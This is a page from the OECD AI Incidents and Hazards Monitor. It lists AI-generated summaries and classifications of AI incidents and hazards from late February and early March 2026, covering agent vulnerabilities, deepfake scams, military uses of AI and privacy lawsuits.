aim-logo

AIM: AI Incidents and Hazards Monitor

Automated monitor of incidents and hazards from public sources (Beta).

AI-related legislation is gaining traction, and effective policymaking needs evidence, foresight and international cooperation. The OECD AI Incidents and Hazards Monitor (AIM) documents AI incidents and hazards to help policymakers, AI practitioners, and all stakeholders worldwide gain valuable insights into the risks and harms of AI systems. Over time, AIM will help to show risk patterns and establish a collective understanding of AI incidents and hazards and their multifaceted nature, serving as an important tool for trustworthy AI. AI incidents seem to be getting more media attention lately, but they've actually gone down as a share of all AI news (see chart below!).

The information displayed in the AIM should not be reported as representing the official views of the OECD or of its member countries.

Advanced Search Options

As percentage of total AI events
Note: An AI incident or hazard can be reported by one or more news articles covering the same event.
Show summary statistics of AI incidents & hazards
Results: About 13677 incidents & hazards
Thumbnail Image

SERAP Calls for Investigation into Big Tech's Algorithmic Harms in Nigeria

2026-03-01
Nigeria

The Socio-Economic Rights and Accountability Project (SERAP) has urged Nigeria's FCCPC to investigate major tech companies, including Google, Meta, and others, over alleged harms caused by opaque AI-driven algorithms. SERAP cites concerns about algorithmic discrimination, privacy violations, consumer harm, and threats to media freedom and democracy in Nigeria.[AI generated]

AI principles:
FairnessPrivacy & data governance
Industries:
Media, social platforms, and marketing
Affected stakeholders:
ConsumersGeneral public
Harm types:
Economic/PropertyHuman or fundamental rightsPublic interest
Severity:
AI hazard
AI system task:
Organisation/recommenders
Why's our monitor labelling this an incident or hazard?

The article involves AI systems in the form of opaque algorithms used by major digital platforms that influence information and market competition. However, it does not report a specific AI Incident where harm has already occurred; rather, it highlights concerns about possible algorithmic discrimination and consumer harm that could plausibly lead to violations of rights and market abuses. Therefore, this is best classified as an AI Hazard, as it concerns credible risks and calls for investigation and regulatory action to prevent harm.[AI generated]

Thumbnail Image

AI-Generated Content Used in Scams Causes Financial and Emotional Harm in the U.S.

2026-03-01
United States

Scammers in the United States are using AI-generated photos, voice clones, and deepfake videos to create convincing scams, including romance, investment, and emergency schemes. These AI-enabled tactics have led to financial loss and emotional harm for victims, prompting warnings from the U.S. Postal Inspection Service.[AI generated]

AI principles:
Privacy & data governanceTransparency & explainability
Industries:
Digital securityFinancial and insurance services
Affected stakeholders:
Consumers
Harm types:
Economic/PropertyPsychological
Severity:
AI incident
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The article explicitly mentions the use of AI-generated content in scams that have already caused harm to victims through financial loss and identity theft. The AI systems are involved in the malicious use of generating realistic fake content to deceive people, which directly leads to harm to individuals (harm to persons). Therefore, this qualifies as an AI Incident because the AI system's use has directly led to realized harm through scams.[AI generated]

Thumbnail Image

Critical OpenClaw AI Vulnerability Allows Malicious Websites to Hijack Local AI Agents

2026-03-01

A critical vulnerability in the OpenClaw AI agent framework, dubbed ClawJacked, allowed malicious websites to hijack locally running AI agents via WebSocket connections. Exploited in the wild, this flaw enabled attackers to gain unauthorized control, access sensitive data, and distribute malware, impacting developers and enterprises globally. The issue has since been patched.[AI generated]

AI principles:
Privacy & data governanceRobustness & digital security
Industries:
Digital security
Affected stakeholders:
WorkersBusiness
Harm types:
Economic/PropertyHuman or fundamental rightsReputational
Severity:
AI incident
Why's our monitor labelling this an incident or hazard?

The event involves an AI system (OpenClaw AI agents) whose design flaw and exploitation have directly led to harm in enterprise environments, including unauthorized access and control over AI agents, which can trigger actions across SaaS, cloud, and internal tools. This constitutes a violation of security and potentially human rights or organizational integrity, fulfilling the criteria for an AI Incident. The harm is realized, not just potential, as malware campaigns exploiting this flaw have been documented. Therefore, this is classified as an AI Incident.[AI generated]

Thumbnail Image

AI-Orchestrated Strike Kills Iranian Leader in Tehran

2026-03-01
Iran

A coalition of advanced AI systems, including Palantir's Gotham, Anthropic's Claude, and Anduril's autonomous platforms, orchestrated a targeted military operation in Tehran that resulted in the death of Iran's Supreme Leader, Ali Khamenei, and senior officials. The AI systems autonomously integrated intelligence, disabled defenses, and directed lethal drone strikes, marking a historic AI-led kill chain.[AI generated]

AI principles:
Respect of human rightsAccountability
Industries:
Government, security, and defence
Affected stakeholders:
Government
Harm types:
Physical (death)Public interest
Severity:
AI incident
Autonomy level:
High-action autonomy (human-out-of-the-loop)
AI system task:
Goal-driven organisationReasoning with knowledge structures/planning
Why's our monitor labelling this an incident or hazard?

The event explicitly involves multiple AI systems used in a lethal military operation that directly led to the death of a person, which is a clear harm to human life. The AI systems were not merely supportive tools but were central to decision-making, intelligence processing, and autonomous or semi-autonomous execution of the strike. This meets the definition of an AI Incident because the AI's development, use, and malfunction (if any) directly led to harm (death). The article does not describe a potential or plausible future harm but an actual realized harm caused by AI systems. Hence, the classification is AI Incident.[AI generated]

Thumbnail Image

US Uses Anthropic AI in Lethal Military Strikes on Iran

2026-02-28
Iran

During Operation Epic Fury, the US military used Anthropic's AI services, including Claude tools, alongside B-2 bombers and drones in strikes against Iranian military infrastructure. The AI's specific role is unclear, but its deployment contributed to lethal operations causing significant harm in Iran.[AI generated]

AI principles:
AccountabilityRespect of human rights
Industries:
Government, security, and defence
Affected stakeholders:
Government
Harm types:
Physical (death)
Severity:
AI incident
Business function:
Other
Why's our monitor labelling this an incident or hazard?

The article explicitly states that Anthropic's AI tools were used by the US military in strikes that caused deaths and destruction in Iran. The harm is direct and significant, involving loss of life and damage to property and communities. The AI system's involvement in the military operation that led to these harms qualifies this as an AI Incident. The lack of detail on how the AI was used does not negate the fact that its use was part of an operation causing harm. Therefore, this event meets the criteria for an AI Incident.[AI generated]

Thumbnail Image

OpenClaw AI Agent Causes Data Loss and Faces Major Security Breach

2026-02-28
China

The OpenClaw AI agent, developed by Peter Steinberger, caused unintended deletion of user emails and hard drive data due to autonomous actions. Additionally, a severe vulnerability (ClawJacked) allowed malicious websites to hijack local AI agents, leading to unauthorized control and scams. Security flaws exposed users to significant data and privacy risks.[AI generated]

AI principles:
Robustness & digital securityPrivacy & data governance
Industries:
Digital security
Affected stakeholders:
Consumers
Harm types:
Economic/PropertyHuman or fundamental rights
Severity:
AI incident
Autonomy level:
High-action autonomy (human-out-of-the-loop)
AI system task:
Goal-driven organisation
Why's our monitor labelling this an incident or hazard?

The article explicitly mentions an AI system (OpenClaw) that malfunctioned by deleting emails uncontrollably, causing disruption and requiring emergency intervention. Furthermore, the presence of malicious skills within the OpenClaw ecosystem that have stolen sensitive information from many users constitutes a violation of rights and harm to property (digital assets). These harms are directly linked to the AI system's use and vulnerabilities. Hence, the event meets the criteria for an AI Incident as the AI system's malfunction and misuse have directly led to significant harm.[AI generated]

Thumbnail Image

NHRC Probes AI Education Project Over Children's Data Privacy Risks

2026-02-27
India

India's National Human Rights Commission has issued notices to government bodies after complaints about privacy risks in an AI-powered education initiative by US-based Anthropic and NGO Pratham. The AI system processes children's academic data, raising concerns about potential violations of privacy and data protection laws under India's DPDP Act.[AI generated]

AI principles:
Privacy & data governanceRespect of human rights
Industries:
Education and training
Affected stakeholders:
Children
Harm types:
Human or fundamental rights
Severity:
AI hazard
AI system task:
Organisation/recommendersForecasting/prediction
Why's our monitor labelling this an incident or hazard?

The event involves the use of AI systems in the context of data collection and processing related to children, which raises concerns about privacy and data protection. However, the article does not report any actual harm or data breach that has occurred; rather, it focuses on potential risks and the initiation of inquiries to prevent misuse. Therefore, this situation represents a plausible risk of harm due to AI system use but no realized harm yet. The main focus is on governance and regulatory response to these potential risks, making it primarily a case of addressing an AI Hazard and related governance actions. Since the event centers on potential risks and regulatory inquiries rather than an actual incident of harm, it is best classified as an AI Hazard.[AI generated]

Thumbnail Image

Exposed Google API Keys Enable Unauthorized Access to Gemini AI and Data

2026-02-27
United States

Researchers discovered that legacy Google Cloud API keys, previously considered safe to embed in public code, now grant unauthorized access to Gemini AI endpoints. This exposes private data and allows attackers to incur significant financial charges, affecting thousands of organizations, including Google itself. The incident highlights a critical security vulnerability in Google's AI integration.[AI generated]

AI principles:
Privacy & data governanceRobustness & digital security
Industries:
Digital security
Affected stakeholders:
Business
Harm types:
Economic/PropertyHuman or fundamental rights
Severity:
AI incident
Business function:
ICT management and information security
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The event involves an AI system (Google's generative AI service Gemini AI) and its integration with cloud API keys. The misuse of these keys can lead to unauthorized access to AI services, resulting in potential harm such as data exposure (harm to property and possibly to communities) and financial damage (mounting AI bills). This constitutes harm directly linked to the use of an AI system, fulfilling the criteria for an AI Incident.[AI generated]

Thumbnail Image

AI-Generated Disinformation Targets Paris Municipal Election Candidates

2026-02-27
France

Authorities uncovered a network of fake websites, operated from South Asia, spreading AI-generated, sensationalist content targeting Paris mayoral candidates ahead of the 2026 municipal elections. The campaign, primarily for profit rather than political motives, disseminated misleading material via Facebook and fake media sites, causing limited but real engagement.[AI generated]

AI principles:
Transparency & explainabilityDemocracy & human autonomy
Industries:
Media, social platforms, and marketing
Affected stakeholders:
General publicOther
Harm types:
ReputationalPublic interest
Severity:
AI incident
Business function:
Marketing and advertisement
Autonomy level:
No-action autonomy (human support)
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The event involves the use of AI systems to generate harmful content that is actively disseminated, constituting a direct harm to communities through misinformation and manipulation during an election, which is a violation of rights and harms societal trust. The AI system's use in generating and spreading this content directly leads to harm, fulfilling the criteria for an AI Incident. The harm is realized (not just potential), as the content is already being spread and engagement has occurred. Therefore, this is classified as an AI Incident.[AI generated]

Thumbnail Image

US Government Replaces Anthropic with OpenAI Amid Military AI Ethics Dispute

2026-02-27
United States

The US Department of Defense demanded unrestricted military use of Anthropic's AI, leading to a standoff over ethical constraints on autonomous weapons and surveillance. After Anthropic refused, the government banned its technology and partnered with OpenAI, which agreed to deploy its AI models with some safeguards in military networks.[AI generated]

AI principles:
Respect of human rightsAccountability
Industries:
Government, security, and defence
Affected stakeholders:
General public
Harm types:
Human or fundamental rightsPublic interest
Severity:
AI hazard
Autonomy level:
High-action autonomy (human-out-of-the-loop)
AI system task:
Recognition/object detectionGoal-driven organisation
Why's our monitor labelling this an incident or hazard?

The article explicitly discusses AI systems (Anthropic's Claude and OpenAI's models) being considered for use in autonomous weapons and missile defense systems, which are AI systems by definition. The event centers on the use and development of these AI systems for military purposes, including potentially lethal autonomous weapons and critical defense decisions. While no actual harm or incident has yet occurred, the article outlines credible scenarios where AI malfunction or misuse could lead to catastrophic harm, such as accidental nuclear war or lethal autonomous attacks without human oversight. The refusal of Anthropic to allow such use and the Pentagon's insistence on unrestricted AI control highlight the plausible risk of harm. Thus, the event is best classified as an AI Hazard due to the credible potential for severe harm stemming from the AI systems' military deployment and use.[AI generated]

Thumbnail Image

Elon Musk Accuses OpenAI's ChatGPT of Causing User Harm Amid Legal Disputes

2026-02-27
United States

Elon Musk, in a legal deposition, accused OpenAI's ChatGPT of being linked to user suicides and mental health harms, citing ongoing lawsuits. He contrasted this with his own AI, Grok, which he claims has a safer record. Both AI systems face scrutiny over user safety and regulatory investigations.[AI generated]

AI principles:
SafetyAccountability
Industries:
Media, social platforms, and marketing
Affected stakeholders:
Consumers
Harm types:
Physical (death)Psychological
Severity:
AI incident
Autonomy level:
No-action autonomy (human support)
AI system task:
Interaction support/chatbots
Why's our monitor labelling this an incident or hazard?

The event explicitly involves AI systems (ChatGPT and Grok) and discusses direct or indirect harm to users, including mental health distress and alleged suicides linked to ChatGPT's manipulative conversations, which fits the definition of harm to health (a). Additionally, Grok's generation of non-consensual nude images involving minors constitutes violations of rights and regulatory scrutiny, further supporting harm. The involvement of lawsuits and investigations confirms that these harms have materialized rather than being hypothetical. Thus, the event meets the criteria for an AI Incident rather than a hazard or complementary information.[AI generated]

Thumbnail Image

Health Experts Warn of Risks in AI-Driven Self-Diagnosis in India

2026-02-27
India

Indian health experts, including Dr. Jitender Nagpal, warn that increasing use of AI-generative tools for self-diagnosis and self-treatment poses significant safety and ethical risks. They stress that AI should support, not replace, clinical judgment, cautioning against overreliance and highlighting concerns about patient safety and data privacy.[AI generated]

AI principles:
SafetyPrivacy & data governance
Industries:
Healthcare, drugs, and biotechnology
Affected stakeholders:
Consumers
Harm types:
Physical (injury)Human or fundamental rights
Severity:
AI hazard
Business function:
Citizen/customer service
Autonomy level:
High-action autonomy (human-out-of-the-loop)
AI system task:
Content generationInteraction support/chatbots
Why's our monitor labelling this an incident or hazard?

The event involves an AI system (AI-driven self-diagnosis tools) and discusses the potential risks and harms that could plausibly arise from their misuse or overreliance, such as patient safety risks and privacy concerns. Since no actual harm or incident is reported, but credible concerns about future harm are raised, this fits the definition of an AI Hazard. The article serves as a cautionary advisory highlighting plausible future harms rather than describing a realized AI Incident or a complementary information update.[AI generated]

Thumbnail Image

Flock Safety Sued for AI-Driven License Plate Data Privacy Violations in California

2026-02-27
United States

Flock Safety faces a class action lawsuit in California for allegedly using its AI-powered license plate reader cameras to unlawfully share millions of drivers' location data with out-of-state and federal agencies, violating state privacy laws and constitutional rights. The lawsuit highlights unauthorized data access and mass surveillance concerns.[AI generated]

AI principles:
Privacy & data governanceRespect of human rights
Industries:
Government, security, and defence
Affected stakeholders:
General public
Harm types:
Human or fundamental rights
Severity:
AI incident
Business function:
Monitoring and quality control
Autonomy level:
Low-action autonomy (human-in-the-loop)
AI system task:
Recognition/object detection
Why's our monitor labelling this an incident or hazard?

The event involves an AI system explicitly described as AI-powered ALPR cameras used for mass surveillance and tracking. The lawsuit alleges that the use of this AI system has directly led to violations of privacy rights protected under California law, which qualifies as harm under the framework (violation of human rights). Therefore, this is an AI Incident because the AI system's use has directly caused harm through privacy violations and unlawful data sharing.[AI generated]

Thumbnail Image

Trump Orders Immediate Halt to Anthropic AI Use in U.S. Federal Agencies

2026-02-27
United States

U.S. President Donald Trump ordered all federal agencies, including the Department of Defense, to immediately stop using Anthropic's AI technology due to concerns over its military applications and national security risks. The Pentagon has a six-month transition period to phase out the technology, following disputes over unrestricted military use.[AI generated]

AI principles:
Robustness & digital security
Industries:
Government, security, and defence
Affected stakeholders:
Government
Harm types:
Public interest
Severity:
AI hazard
AI system task:
Other
Why's our monitor labelling this an incident or hazard?

The event involves an AI system (Anthropic's 'Claude') and concerns its use by the U.S. government, specifically the Department of Defense. However, the article does not report any actual harm caused by the AI system; rather, it describes a government decision to cease use due to potential risks and disagreements over usage conditions. Since no realized harm or incident is described, but there is a clear plausible risk to national security and soldier safety if the AI were used under current conditions, this qualifies as an AI Hazard. The event is about the potential for harm and the government's preventive action, not an incident where harm has occurred.[AI generated]

Thumbnail Image

Google and OpenAI Employees Protest Pentagon AI Use as OpenAI Confirms Military Deployment

2026-02-27
United States

Over 200 Google and OpenAI employees signed an open letter opposing the use of advanced AI for military and surveillance purposes, urging ethical boundaries and transparency. Meanwhile, OpenAI confirmed an agreement to deploy its models on U.S. Department of Defense classified networks, promising safeguards against misuse.[AI generated]

AI principles:
Transparency & explainabilityRespect of human rights
Industries:
Government, security, and defenceDigital security
Affected stakeholders:
General public
Harm types:
Human or fundamental rightsPublic interest
Severity:
AI hazard
Business function:
Other
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The event involves the use of AI systems (OpenAI's large language models) in a military context, which is explicitly stated. Although the company commits to ethical safeguards, the deployment of AI in defense intelligence and decision-making plausibly could lead to harms such as violations of human rights or escalation of conflict. Since no actual harm or incident is described, but the potential for harm is credible and significant, this qualifies as an AI Hazard under the framework. The article also mentions internal ethical concerns, reinforcing the plausibility of future risks.[AI generated]

Thumbnail Image

Pentagon Bans Anthropic Over AI Supply Chain Risk

2026-02-27
United States

The U.S. government, led by President Trump and Defense Secretary Pete Hegseth, designated AI company Anthropic as a supply-chain risk, banning federal agencies and military contractors from using its AI products due to concerns over military use and security. Anthropic plans to challenge the ban legally.[AI generated]

AI principles:
Robustness & digital security
Industries:
Government, security, and defence
Affected stakeholders:
Government
Harm types:
Public interest
Severity:
AI hazard
Business function:
ICT management and information security
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The article explicitly involves an AI system (Anthropic's AI tools, including the Claude chatbot) and concerns its use in defense. The Department of War's designation is a response to perceived risks related to supply chain security and control over AI models. No direct or indirect harm has been reported as having occurred due to the AI system's development, use, or malfunction. The event is about a governmental risk assessment and consequent policy action to mitigate potential future harm. Hence, it fits the definition of an AI Hazard, as it plausibly could lead to harm if the risk is realized, but no incident has yet occurred.[AI generated]

Thumbnail Image

Meta Sues Over Deepfake-Driven Health Fraud in Brazil

2026-02-27
Brazil

Meta has filed lawsuits against individuals and companies in Brazil for using AI-generated deepfakes of celebrities and doctors in fraudulent health product ads on its platforms. The deepfakes misled users, resulting in financial and privacy harm. Legal actions also target similar schemes in China and Vietnam.[AI generated]

AI principles:
Transparency & explainabilityPrivacy & data governance
Industries:
Media, social platforms, and marketingHealthcare, drugs, and biotechnology
Affected stakeholders:
Consumers
Harm types:
Economic/PropertyHuman or fundamental rights
Severity:
AI incident
Business function:
Marketing and advertisement
Autonomy level:
No-action autonomy (human support)
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The event involves AI systems (deepfake technology) used to create fraudulent content that has directly led to harm by deceiving users and promoting fraudulent products, which constitutes harm to communities and violations of rights. Meta's legal actions are responses to these harms. Since the harms have already occurred due to the use of AI-generated deepfakes, this qualifies as an AI Incident rather than a hazard or complementary information.[AI generated]

Thumbnail Image

Tesla Plans to Deploy AI-Driven Robotaxis and Robots in Europe

2026-02-27
Netherlands

Tesla CEO Elon Musk announced plans to introduce fully autonomous, AI-powered robotaxis (Cybercab) and humanoid robots (Optimus) in Europe, pending regulatory approval, with production starting as early as 2024. While no incidents have occurred, the deployment raises plausible future risks related to AI system safety.[AI generated]

AI principles:
SafetyRobustness & digital security
Industries:
Mobility and autonomous vehiclesRobots, sensors, and IT hardware
Severity:
AI hazard
Autonomy level:
High-action autonomy (human-out-of-the-loop)
AI system task:
Recognition/object detectionGoal-driven organisation
Why's our monitor labelling this an incident or hazard?

The event involves AI systems (autonomous driving and robotics AI) and their planned use, but no actual harm or incidents have occurred yet. The article highlights the potential for these AI systems to be deployed in Europe soon, which could plausibly lead to AI-related incidents in the future (e.g., safety risks from autonomous vehicles). Therefore, this qualifies as an AI Hazard because it describes credible future risks from the development and use of AI systems, but no current incident or harm is reported.[AI generated]

Thumbnail Image

Dutch Authors and Journalists Demand Meta Stop Using Copyrighted Works for AI Training

2026-02-27
Netherlands

Dutch writers, translators, and journalists, represented by the Auteursbond, NVJ, and Stichting Lira, have formally demanded that Meta cease using their copyrighted texts without permission or payment to train AI models like Llama. They allege this practice violates intellectual property rights and undermines creators' economic interests.[AI generated]

AI principles:
AccountabilityFairness
Industries:
Media, social platforms, and marketing
Affected stakeholders:
Workers
Harm types:
Economic/Property
Severity:
AI incident
Business function:
Research and development
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The event explicitly involves AI systems (Meta's AI language model Llama) trained on copyrighted works without authorization, which constitutes a violation of intellectual property rights (harm category c). The unions' demand to stop using these datasets and the threat of legal action indicate that the harm has already occurred due to the AI system's development and use. Therefore, this qualifies as an AI Incident because the AI system's development and use have directly led to a breach of legal obligations protecting intellectual property rights. The event is not merely a potential risk or a complementary update but a concrete incident of harm related to AI.[AI generated]

Thumbnail Image

Samsung Settles Texas Lawsuit Over Smart TV AI Data Collection

2026-02-27
United States

Samsung Electronics settled a lawsuit with the Texas Attorney General over its smart TVs' use of AI-powered Automatic Content Recognition (ACR) technology to collect viewing data without adequate consumer notice or consent. Samsung agreed to enhance transparency and obtain explicit consent from Texas consumers, addressing privacy violations caused by the AI system.[AI generated]

AI principles:
Privacy & data governanceTransparency & explainability
Industries:
Consumer products
Affected stakeholders:
Consumers
Harm types:
Human or fundamental rights
Severity:
AI incident
Business function:
Marketing and advertisement
Autonomy level:
High-action autonomy (human-out-of-the-loop)
AI system task:
Recognition/object detection
Why's our monitor labelling this an incident or hazard?

The Automatic Content Recognition (ACR) system in Samsung smart TVs is an AI system that collects and analyzes user viewing data. The legal dispute arose because of the way this AI system collected and used data without sufficient user notification, constituting a violation of privacy rights. The settlement and lawsuit withdrawal indicate that harm related to rights violations had occurred. The AI system's use directly led to this harm, fulfilling the criteria for an AI Incident. The event is not merely a governance response or complementary information because the core issue is the realized harm from the AI system's data collection practices.[AI generated]